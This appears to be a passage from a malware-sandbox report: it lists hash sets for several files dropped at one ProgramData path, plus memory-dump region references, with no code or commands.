MD5 2b64cb6b803820740cdad1c99b97e4bd
SHA1 66a1b03d258a9b42a76cddcba31559107215fc8c
SHA256 c21ceb346cbabaf3a6c5fcd1783904c890ea1ecf7fcc94ae3ba41b90291bf71a
SHA512 b825a1cf003359bdf81ab7afd79ea78bf373d204a2492c11227a69d5d6d718d7afe73f26beac7e4b68aa9902525400015d3999d30ba95f8b29876de400a19c68

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 ae85bbb30233d8aafab254a7d54e6720
SHA1 7def98d6ae17350332cb06725f3b64cf705aa98b
SHA256 e9f45c68a850a3fbf4b691fc5926811e7f8342af8d712fff09bc9bb80cee9b3c
SHA512 62c39f6ae2da9479bada027beae55f0103207be233ad3bd54b46056221b6cae6a09c2dc5fa77b13e3dfbd237017280212a2b47b0e62a6435136a37a6e2777544

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 e4f7b0f5b4e75f97843e001cfdfa49f9
SHA1 e16f03c5b7c100b43446791595697823b63e6518
SHA256 7a3217c0e475331fe842d040c819f37a299756bff474db5425108ebc48a1fc71
SHA512 961c55f3cc20d6719b34c931c4872ff809d504ec766a120c2dd995da2e5aacefcc5aee5781be5af5fd43b5d343d5b1fdddb736433904b66fe7eec2e99ba110e6

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 3a1967c887226322f1c249e908ec18dd
SHA1 419a6a646186ddd88c5f724b464d5dd81ef4bc75
SHA256 f9350428df91b736dd965a3084d01bec05e2f3c084f4a39890b15bab37663c5c
SHA512 232fff07351e5fe4d225980a26a7d3cfb0a43f8d1144d887c3e9b694da7e75027c912cd7ebdae34a430d68b4495505e34517400c8f841da790fcc69d7cad943e

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 440b5b55068f2dfcfd2c3bd0dff114b4
SHA1 0fd00af7aa7709ba5954fd9102e9b37323bc575c
SHA256 9db72a1385fc6e2ae2e4868d7034e5d9d59173a3988eae648d08e2dabf7f1588
SHA512 d2431aec55d978b35a59808a5a40cfdec3de1b14c0ec5573b50b2869ea1278ce4d5985b2c0061b405f77ba9ded512877ebcec4efded601fe4005cf875f670d65

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 aa67e5b6c44aa5bd38774f608e8f48ce
SHA1 d0d822803a7be363b56d601d016ffbbe2eee127e
SHA256 1ff4c9627e308c8340a28cec66e9c050dd6f104382d530cb037b09656ed2670d
SHA512 3d5c773a930042e60d5a56ed317aeb31e558092735f5924247d953e045c8643a91c57ee5e3bfefced170de98c62717324bf478e90e972558fd7c16179891d134

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 c4d09d3b3516550ad2ded3b09e28c10c
SHA1 7a5e77bb9ba74cf57cb1d119325b0b7f64199824
SHA256 66433a06884f28fdabb85a73c682d1587767e1dfa116907559ec00ed8d0919d3
SHA512 2e7800aae592d38c4a6c854b11d0883de70f938b29d78e257ab47a8a2bbf09121145d0a9aea9b56c16e18cde31b693d31d7ebfcd0473b7c15df5d7ae6708bbd2

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 29be5db653313ca26fc71fd29a9c87be
SHA1 8e94e68e9ee653801022d9b6e390a9a4d9421044
SHA256 a23ca34daf17f745e1e84bf09378868d19d82d22e3eb118596ab3ceca3c118df
SHA512 15aa7fb3bd9216495101f8656be48d8a2797106809a6c51de401ca1f8fe133caeca4c761d4db637bba1a359ab793e20f91cf33b0b5bc9b2e4baa2e1788a1bc93

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 adcab2dc127c140ca478234768c2fc05
SHA1 2845c0ca3d0778f74a8b43dcf58a9eef71080c03
SHA256 ab875d94bb5895891b41430e6b96698e00dad1897b2403f1295d5185c13994ab
SHA512 1daf20c9ec43f83241ca004f3cabdf2c8ce889b9bc8276f68718eda337e6e719472a30b505ca27415aa299c8fbf654be3fc0319815be7f9733a6d77f7ea07846

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 75c39430eb6b002fbbbb624060196545
SHA1 2200486859babd1f54604815b1a76f3522860eec
SHA256 6fad1b2807cd28dbfe9c1f2f65852f556a5bcecaae22b91e39b22e8b19aa4884
SHA512 fa5de7de93984ae7d223dc52d7bf95fbd5e35b266289e196540c459e00c03aa3df5e9ad5b7172163269a0eda562962c8b62697a9ac3cd6eea3c1f803f89c1bee

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 340200850de98f311bb4634553b2cf93
SHA1 44afa4f2c13e01a296c7fd3a8fc532b31a95b29d
SHA256 f3877fcb8211a032929de62bce555f443024aecc35d3db0f449169ff6768c868
SHA512 6e48d42219e5e744d1ec57395dcb86ad7e3b8a581552f223e4d869df0c35352a562aa1e8021a57cca20960b05f03f3e38e837b935bd246e4a7a4c6e24fe439a0

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 e77632d2b67f00e8244aed09432661bd
SHA1 aacf985a45e44ba92f3ebe204a3a0e3fc0436be4
SHA256 ae1b5b4e2f182b2d6978c87e5f71fb572aa235a3246220f74b8c9855fd95e864
SHA512 a5d0f61a01e088efbbe2b11ba0192a8584990cf016df4aab887070a02620f64a5907a0cd5a7408b0bbc8e38ae072074dce32c7aeab65639969f98a518aa500a7

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 fc353f2e1c1e2cc084e98df010e320b3
SHA1 b4660f49bb5ce94bdf8fb6340bfe7c82149bb4ff
SHA256 22f6ab4e41f7479308993930873a3150f0bed88fe7ec983653f967f9f3147d7d
SHA512 8470703feaea08f841e68ceb19426e23a0461ba12f63527c5b827d6976525e3277a6858ca6223d35e5dc5bc859f22608b90420df9a59d980a5acb79bd6b2c3c9

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 79d4f5cfc7ab132bc6c5e4770d76ea38
SHA1 e29002453abc0bdf1566e985e3c52ae7469aa56a
SHA256 da5c6add93975ddcea4fe495670b9939f72e42f063da1d0f5d34614cfb2b541e
SHA512 c76ebb824a2a4c31090139e95102693b29d421aea5a48c39f04930267795c1801d9a9740ccb630d5fdf42a877e82a3fc0de347ff8ef2f5d3ebe2ce2f297b4185

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 944f318d87acba3debc921958d57fac5
SHA1 f20fa39eee769102198e633e404feefbdc33d8ce
SHA256 079d36524f458c0ee6178834fefabc471e183024d8a6ec758b1027b0ebcb0187
SHA512 fe242ef03e00677c5bcec1c1f8e5f4dfbcba075bc8f2859e2ea3a7e062f63708562f401fd1b3dad57e18a4bd6926c4389b10b5e2f2a8626ea2b60ff04a0d3665

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 2eab29acb6c820edf699e3bb8042ec82
SHA1 61359d4e372ad21deb5c32f9270e2cec1d767915
SHA256 bd20847ccb1ccf79b6c5d7f444fb208d212e5f3ff7a6bf45d9f6e6e2d60d261f
SHA512 7b9f0652d34ab09fb9d36c0e293db1683a9cb37cb86c87ee509828f9ba65b1be6e4cab756c4c5606af1ff0a80a9c3b8ed62fc5f64ec20d844fd3f3b09c71a155

memory/3412-307-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3412-309-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3412-305-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3412-306-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3412-304-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3412-303-0x0000000140000000-0x000000014000E000-memory.dmp